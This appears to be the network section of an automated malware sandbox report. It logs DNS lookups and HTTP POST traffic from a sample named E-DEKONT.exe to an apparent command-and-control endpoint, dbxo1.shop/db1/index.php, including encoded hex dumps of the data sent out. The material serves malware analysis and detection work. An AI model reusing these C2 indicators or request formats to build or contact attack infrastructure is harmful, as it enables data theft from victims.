                                                                          Nov 29, 2022 09:20:41.317768097 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317778111 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317789078 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317799091 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317810059 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317820072 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317831039 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317840099 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.317842007 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317941904 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317953110 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317964077 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317974091 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317985058 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.317996025 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318003893 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.318003893 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.318003893 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.318003893 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.318003893 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.318003893 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.318006992 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318003893 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.318003893 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.318017960 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318027973 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318028927 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.318028927 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.318028927 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.318028927 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.318038940 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318049908 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318061113 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318070889 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318083048 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318093061 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318175077 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.318175077 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.318175077 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.318175077 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.318207026 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318217993 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318228006 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318238974 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318249941 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318259954 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318270922 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318288088 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318300962 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318311930 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318322897 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318334103 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318344116 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318346024 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.318346024 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.318346024 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.318346024 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.318346024 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.318355083 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318366051 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318376064 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318387032 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318397999 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318408012 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318435907 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318447113 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318458080 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318468094 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318479061 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318490028 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318500996 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318511963 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318516970 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.318516970 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.318516970 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.318516970 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.318517923 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.318517923 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.318521976 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318532944 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318543911 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.318681002 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.318681002 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.318681002 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.318681002 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.318681002 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.728874922 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:42.201445103 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:42.210258007 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:53.661503077 CET4985980192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:53.670319080 CET8049859104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:53.670452118 CET4985980192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:53.671021938 CET4985980192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:53.671114922 CET4985980192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:53.671147108 CET4985980192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:53.671185970 CET4985980192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:53.679902077 CET8049859104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:53.679913044 CET8049859104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:53.679996014 CET8049859104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:53.680005074 CET8049859104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:53.680012941 CET8049859104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:53.680021048 CET8049859104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:53.680109978 CET8049859104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:53.680118084 CET8049859104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:53.680125952 CET8049859104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:53.680133104 CET8049859104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:53.680166006 CET4985980192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:53.680210114 CET4985980192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:53.680262089 CET4985980192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:53.680452108 CET4985980192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:53.688786030 CET8049859104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:53.688899994 CET8049859104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:53.688910961 CET8049859104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:53.688918114 CET8049859104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:53.688925982 CET8049859104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:53.688936949 CET4985980192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:53.688985109 CET4985980192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:53.689011097 CET8049859104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:53.689133883 CET4985980192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:53.689153910 CET8049859104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:53.689163923 CET8049859104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:53.689172029 CET8049859104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:53.689223051 CET8049859104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:53.689304113 CET4985980192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:53.689352036 CET8049859104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:53.689359903 CET8049859104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:53.697587013 CET8049859104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:53.697750092 CET8049859104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:53.697871923 CET8049859104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:54.057970047 CET8049859104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:54.058010101 CET8049859104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:54.058260918 CET4985980192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:54.058435917 CET4985980192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:54.067123890 CET8049859104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:54.278915882 CET8049859104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:54.279221058 CET4985980192.168.11.20104.21.44.194

                                                                          UDP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Nov 29, 2022 09:20:37.799755096 CET5551153192.168.11.201.1.1.1
                                                                          Nov 29, 2022 09:20:37.816898108 CET53555111.1.1.1192.168.11.20
                                                                          Nov 29, 2022 09:20:38.907119989 CET6124953192.168.11.201.1.1.1
                                                                          Nov 29, 2022 09:20:38.931262970 CET53612491.1.1.1192.168.11.20

                                                                          DNS Queries

                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                          Nov 29, 2022 09:20:37.799755096 CET192.168.11.201.1.1.10xc840Standard query (0)aapancart.comA (IP address)IN (0x0001)false
                                                                          Nov 29, 2022 09:20:38.907119989 CET192.168.11.201.1.1.10x96fStandard query (0)dbxo1.shopA (IP address)IN (0x0001)false

                                                                          DNS Answers

                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                          Nov 29, 2022 09:20:37.816898108 CET1.1.1.1192.168.11.200xc840No error (0)aapancart.com103.14.99.114A (IP address)IN (0x0001)false
                                                                          Nov 29, 2022 09:20:38.931262970 CET1.1.1.1192.168.11.200x96fNo error (0)dbxo1.shop104.21.44.194A (IP address)IN (0x0001)false
                                                                          Nov 29, 2022 09:20:38.931262970 CET1.1.1.1192.168.11.200x96fNo error (0)dbxo1.shop172.67.203.65A (IP address)IN (0x0001)false

                                                                          HTTP Request Dependency Graph

                                                                          • aapancart.com
                                                                          • dbxo1.shop

                                                                          HTTP Packets

                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          0192.168.11.2049851103.14.99.114443C:\Users\user\Desktop\E-DEKONT.exe
                                                                          TimestampkBytes transferredDirectionData


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          1192.168.11.2049852104.21.44.19480C:\Users\user\Desktop\E-DEKONT.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Nov 29, 2022 09:20:38.942379951 CET242OUTPOST /db1/index.php HTTP/1.1
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                                                                          Host: dbxo1.shop
                                                                          Content-Length: 103
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 00 00 00 41 70 9d 32 13 8b 30 60 8b 30 63 8b 30 6c 8b 30 67 8b 30 67 8b 31 11 8b 30 6c 8b 30 61 8b 30 64 8b 30 61 8b 30 6c 8b 30 65 8b 30 62 ef 26 67 ea 42 70 9d 35 70 9d 32 10 8b 30 64 8b 30 60 eb 45 70 9c 47 70 9d 34 70 9d 33 70 9d 36 13 ec 47 70 9d 31 11 8b 31 11 eb 46 16 8b 30 63 8b 30 6c 8b 30 63 eb 40
                                                                          Data Ascii: Ap20`0c0l0g0g10l0a0d0a0l0e0b&gBp5p20d0`EpGp4p3p6Gp11F0c0l0c@
                                                                          Nov 29, 2022 09:20:40.337285042 CET250INHTTP/1.1 200 OK
                                                                          Date: Tue, 29 Nov 2022 08:20:40 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.6.37
                                                                          Vary: Accept-Encoding,User-Agent
                                                                          CF-Cache-Status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3N7uk%2F%2FvZzOgnjRSMTqj5c%2FCc%2FG113peqMCF%2BYkcZFuRRKmnwFlOaQbHub1rbE9MQ5druOO6ulqJbduj%2BhdRzFy2%2Fi5pOyduPb88SyrHmcq1lnoKdDCJVUIUae0S"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 7719ecdf69699048-FRA
                                                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                          Data Raw: 34 34 35 65 0d 0a 3f 36 90 4f 06 dd 77 1e d7 33 21 e2 50 65 dc 4f 04 9e 48 07 c9 68 2d ed 50 03 f8 56 65 f8 50 00 e8 49 05 fc 68 39 e3 51 06 f8 60 07 e9 55 2f cf 30 07 d8 60 13 d9 49 1e c7 36 65 cb 4b 04 dd 48 3c 9b 68 37 9c 4e 24 e2 40 3a db 66 12 d6 79 1e c9 68 2f e3 42 3e dc 40 06 9e 49 11 ff 73 12 ed 57 1c e4 49 03 f8 57 07 f8 49 04 fb 68 6c e9 50 00 d6 45 1f f8 7b 10 cc 31 1b 9f 61 02 f8 76 31 e6 4d 36 ed 50 3a db 67 1d c6 33 19 ed 6c 20 f4 44 6c c4 48 3c d9 72 19 c0 6b 26 cd 7a 3a e4 4e 2f ef 49 1e d9 68 21 ed 52 65 e5 50 04 c5 7b 18 ea 4a 20 e3 57 1c 9b 4f 3f eb 33 18 d7 37 61 e0 47 25 cf 52 04 9e 48 69 81 60 6b 92 6d 6b 07 16 0c 82 a6 43 b3 75 f4 a5 1e 37 09 14 00 82 a8 5f f0 71 f2 a7 56 79 0a 57 48 9e e6 00 b0 66 f1 a7 09 19 3c f6 65 ac cb 30 9e 06 9d cb 33 ab 99 66 65 17 cb 30 9e 02 9d cb 33 14 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 ec 66 66 65 a1 d4 8a 90 02 29 c2 fe 75 de 67 29 62 ea 64 f6 6b ee eb 43 26 09 01 17 ce a6 10 fd 63 f3 a5 5c 20 46 04 00 8f b9 45 f0 22 f4 a5 13 10 29 35 45 c2 a4 54 fb 2c 90 c6 39 70 66 66 65 af cb 30 9e d9 f0 c0 f2 cb 6a 03 f7 30 c7 55 0c 9d 91 ae a1 b8 08 03 f6 31 c7 55 0c ee f3 aa a0 c9 6a 03 f7 43 a5 aa 0c 9c 91 ae a1 b8 08 01 f6 31 c7 55 0c 50 f4 a8 5b cb 6a 03 f7 ff 8e 30 9e 4e 9c c9 33 d5 dc 44 c9 af cb 30 9e 02 9d cb 33 b4 66 64 44 a4 ca 3e 94 02 9b cb 33 54 62 66 65 af cb 30 9e 02 9d cb 33 54 76 66 65 af eb 30 9e 02 9d cb 23 54 76 66 65 af c9 30 9e 08 9d cb 33 5e 66 66 65 a5 cb 30 9e 02 9d cb 33 54 56 66 65 af c9 30 9e 0e d7 cb 33 57 66 26 60 af cb 34 9e 02 8d cb 33 54 66 76 65 af db 30 9e 02 9d cb 33 44 66 66 65 af da 30 9e 29 9e cb 33 54 66 66 65 af cb 30 9e 02 bd cb 33 a4 65 66 65 af cb 30 9e 02 9d cb 33 54 6a 66 65 97 f6 30 9e 02 9d cb 33 54 66 66 65 af db 30 9e 56 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb
                                                                          Data Ascii: 445e?6Ow3!PeOHh-PVePIh9Q`U/0`I6eKH<h7N$@:fyh/B>@IsWIWIhlPE{1av1M6P:g3l DlH<rk&z:N/Ih!ReP{J WO?37aG%RHi`kmkCu7_qVyWHf<e03fe03ffe03Tffe03Tffe03ffe)ug)bdkC&c\ FE")5ET,9pffe0j0U1UjC1UP[j0N3D03fdD>3Tbfe03Tvfe0#Tvfe03^ffe03TVfe03Wf&`43Tfve03Dffe0)3Tffe03efe03Tjfe03Tffe0V3Tffe03Tffe0
                                                                          Nov 29, 2022 09:20:40.337395906 CET252INData Raw: 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 7a 12 03 1d db cb 30 9e 29 99 cb 33 54 76 66 65 af cd 30 9e 02 9f cb 33 54 66 66 65 af cb 30 9e 02
                                                                          Data Ascii: 3Tffe03Tffe03Tffe03Tffe03z0)3Tvfe03Tffe03tffCa3efe03Tnfe03Tffe03D03offe0V3Tffe.q23Yffe03dfe0'Tffe03Tffe0P`$}kE$s0c9
                                                                          Nov 29, 2022 09:20:40.337474108 CET253INData Raw: 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb 33 54 66 66 65 af cb 30 9e 02 9d cb
                                                                          Data Ascii: ffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe03Tffe
                                                                          Nov 29, 2022 09:20:40.337546110 CET254INData Raw: 65 99 cb 02 9e 3b 9d f2 33 7a 66 57 65 9a cb 30 9e 46 9d cb 33 55 66 30 65 ce cb 42 9e 44 9d a2 33 38 66 03 65 e6 cb 5e 9e 64 9d a4 33 54 66 66 65 8b cb 34 9e 02 9d 9f 33 26 66 07 65 c1 cb 43 9e 6e 9d aa 33 20 66 0f 65 c0 cb 5e 9e 02 9d cb 33 5d
                                                                          Data Ascii: e;3zfWe0F3Uf0eBD38fe^d3Tffe43&feCn3 fe^3]ba03Tffe03Tffe03l[fe22RoLM[pU-"8do``3`lN42PXU'2PgR?3bg/26heg0EiC]g@d"k
                                                                          Nov 29, 2022 09:20:40.337619066 CET256INData Raw: 1c ab 77 3c f0 7a d7 35 95 ff bb a0 62 26 85 3b 65 0a 49 e9 e8 cf 3d b1 03 2e f7 0b 1a f0 06 6c 1f 93 c9 fc 8a 05 1b 4c 4a ab d2 ec 90 7e ca 50 30 18 1d 7b 47 fc 49 77 a8 ce ad 60 71 dd c3 54 6f 80 8f 1e a0 81 5a 92 6b 34 a4 1a bc 2a d7 99 c2 ff
                                                                          Data Ascii: w<z5b&;eI=.lLJ~P0{GIw`qToZk4*o*=Z8ut!Ww%cJJ&Fx%Z|~\0);PbYI\=Es~(Os<ZDd e13Tg@~^3Uffd=M{kd528do`f6
                                                                          Nov 29, 2022 09:20:40.337694883 CET257INData Raw: 32 21 08 02 da 69 2d 01 9c 88 0c c4 33 18 ae aa 50 58 c3 2f 70 c1 5c 24 3b c3 f7 15 62 ad fc 1c dd 43 9d 7f 84 50 e5 0f ed 58 48 15 72 0d d3 da 16 13 4b 27 e7 af b7 76 c4 b6 8b 8e d2 15 77 51 0d 2f 77 6d f9 6d 20 d3 71 8d 64 31 bd 90 e3 58 59 4f
                                                                          Data Ascii: 2!i-3PX/p\$;bCPXHrK'vwQ/wmm qd1XYO sjl3xt?srJ*XifO8~O=+*^}QVo1^UC0Y`oO)i6QfV:r1\9WU:BJd9k
                                                                          Nov 29, 2022 09:20:40.337769985 CET258INData Raw: 50 69 bf e9 41 d4 1c cc 9d 74 3c 53 50 32 da f7 3e 30 b8 34 c9 75 da 2d c2 3f e9 fa b2 e4 57 c1 37 94 0b 11 79 20 5a b3 cf c4 49 11 03 1b 8e 0c f8 45 aa 8f 93 c4 9f bd ed 39 fb 3a 09 3a 49 4b 2c dd b4 4e 9d d8 4e 7a 0b d3 6f 9d 53 70 3a 72 58 2d
                                                                          Data Ascii: PiAt<SP2>04u-?W7y ZIE9::IK,NNzoSp:rX-u`"z*_@hu%=G([nYgk(e<`hWv8yIqIz37Fgv[N-b|0AU^uBfg4ua"p'}woKKh1r.e
                                                                          Nov 29, 2022 09:20:40.337841988 CET260INData Raw: 43 6e 49 49 12 d8 bc 1e f3 6b fe b9 5c 27 09 00 11 81 a8 5f f3 2d ed a0 5a 7b 05 03 17 db b8 1f d3 6b fe b9 5c 27 09 00 11 fd a4 5f ea 41 f8 b9 47 7a 05 14 11 9f d8 36 9d 57 80 ee 37 58 56 6c 63 a7 e0 36 9f 07 98 cc 30 5c 56 6b 63 a6 e1 b6 d6 84
                                                                          Data Ascii: CnIIk\'_-Z{k\'_AGz6W7XVlc60\Vkcj2UcceI2\:e!*-7+dDY sJ?G^61gdRI1$s)lc"nQ|"{_RIfFZ 0w+&WTy7kEl@k
                                                                          Nov 29, 2022 09:20:40.337913990 CET261INData Raw: b4 39 50 9e 24 76 a3 b6 55 cc bc 20 9f 68 2f 0e 49 14 eb 32 1f c9 17 52 6f 4c e3 e7 4d c7 93 03 94 cd 02 d6 64 73 55 2d c9 21 9c 03 9c fb b2 da 56 11 54 a4 fb 39 98 01 c8 cf 35 47 64 33 36 9e d8 00 8f 04 9e 9e 37 5c 75 6c 32 ce b8 58 f7 6c fa bf
                                                                          Data Ascii: 9P$vU h/I2RoLMdsU-!VT95Gd367\ul2Xl\:WvU34T5W3bo}a@;EBmG=T/0G~+_mDoc'dv031+s0]`cN2knd~`lMx:WWmcj2SgVyJ<>UocT
                                                                          Nov 29, 2022 09:20:40.337986946 CET262INData Raw: ad 88 39 ae b3 cd f4 c4 90 91 d9 c5 c7 1a 52 c9 00 80 03 59 e9 1d 12 a6 e1 dd ab 0e 2e aa 98 16 d0 d1 a5 76 2b 14 c4 86 e2 b6 ff 16 d0 58 3a d2 0c 6c ea 2a b1 bd 5d fb 75 51 a3 79 8b 65 f5 f4 40 ef 2c 5d b5 32 33 be 28 42 39 75 e1 00 9e ca 33 55
                                                                          Data Ascii: 9RY.v+X:l*]uQye@,]23(B9u3Udt5W3{@5Ubg65Uccb.Zbpa9G^6#1hV7c-{ V!7_ue$20bcv:6RT/gKRV0cUU6Udy`f
                                                                          Nov 29, 2022 09:20:40.338057041 CET264INData Raw: 18 82 8a ca 5c 03 b9 72 6c 3f 1a a8 27 cf 90 ef 1d d9 06 18 74 c0 db fd 90 c5 38 d8 7d 40 38 1c 11 b0 e0 e8 1e 20 27 c4 75 61 dd df 0c 4b 60 f3 ab f6 2a 28 c6 57 10 48 39 23 86 b5 df 2e f1 35 56 d2 00 d4 0c ef 28 0c a1 56 fd 7a 0e 1e 03 9b f3 79
                                                                          Data Ascii: \rl?'t8}@8 'uaK`*(WH9#.5V(Vzyg0dg6)7UQp3.Re3x&{7l/De/BiGwT)2PgR4`Tf020{ia25W3{v2UVze!BrY?Q<[?P`e04


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          2192.168.11.2049859104.21.44.19480C:\Users\user\Desktop\E-DEKONT.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Nov 29, 2022 09:20:53.671021938 CET4926OUTPOST /db1/index.php HTTP/1.1
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                                                                          Host: dbxo1.shop
                                                                          Content-Length: 41815
                                                                          Cache-Control: no-cache
                                                                          Nov 29, 2022 09:20:53.671114922 CET4930OUTData Raw: 41 70 9d 32 13 8b 30 60 8b 30 63 8b 30 6c 8b 30 67 8b 30 67 8b 31 11 8b 30 6c 8b 30 61 8b 30 64 8b 30 61 8b 30 6c 8b 30 65 8b 30 62 ef 26 67 ea 42 70 9d 35 70 9d 32 10 8b 30 64 8b 30 60 eb 45 70 9c 47 70 9d 34 70 9d 33 70 9d 36 13 ec 47 70 9d 31
                                                                          Data Ascii: Ap20`0c0l0g0g10l0a0d0a0l0e0b&gBp5p20d0`EpGp4p3p6Gp11F0c0l0c@)0d0e10eT<g:pp3p2p3p3w0s'p0{p5p7)0m0a0l0g0g0aB'k p2)0e&fp0p1)@`;bAx6m.b:f7b@x4`5`5lB`7.b
                                                                          Nov 29, 2022 09:20:53.671147108 CET4936OUTData Raw: 59 0c e6 42 1d f7 46 19 f7 45 05 e7 41 13 f4 46 01 ea 51 05 ff 41 04 e6 48 18 ed 5b 07 fc 40 14 eb 5a 13 e7 46 07 f6 52 0f f8 40 11 f4 59 17 fe 52 1f e4 47 04 fb 47 1d e5 53 18 ea 41 0d fe 46 17 fe 45 00 fc 5a 14 fe 56 02 f8 54 03 e4 51 02 f6 4b
                                                                          Data Ascii: YBFEAFQAH[@ZFR@YRGGSAFEZVTQKRULZEFHELH[QUBEJVKDSUZQBZ@KY[@EA@WQMHZSM@ORYIEPHDGWDF
                                                                          Nov 29, 2022 09:20:53.671185970 CET4938OUTData Raw: 13 e9 5a 10 e7 41 16 ed 4d 0d fe 59 04 ef 44 05 e6 4d 1b fc 4a 16 e5 50 1e ed 5b 02 eb 51 19 f9 57 13 fd 49 02 fb 50 16 ec 57 03 f9 50 0c fb 55 02 f6 49 04 e6 4e 06 f4 5a 1d ef 4b 0c eb 4f 0c e8 53 1c ec 45 0f eb 57 11 fc 53 04 ec 52 1d e5 4e 16
                                                                          Data Ascii: ZAMYDMJP[QWIPWPUINZKOSEWSRNQBEQYGAIRKN[AVBTUTEDVJ[PEOBPKQDJLMLYALUZMHGWMKZD[KY@ZL
                                                                          Nov 29, 2022 09:20:53.680166006 CET4940OUTData Raw: 56 1c e0 52 07 f9 51 00 f4 53 00 e0 52 07 f6 41 18 eb 47 0d fe 48 14 e8 40 1b fa 4b 0f e6 59 1b e1 50 18 e6 4c 0f f4 47 06 fc 42 16 f4 4e 00 fd 45 00 f4 44 00 e4 54 1c e6 48 04 e5 53 01 f7 59 04 f9 44 0f ef 56 03 fa 40 0f ec 4f 19 eb 41 12 fc 5b
                                                                          Data Ascii: VRQSRAGH@KYPLGBNEDTHSYDV@OA[KMFPI@IUHKA@BITILRWTWUFNGPUBVOQHGM_HVUUUL&UQwUj9p_TSRAE
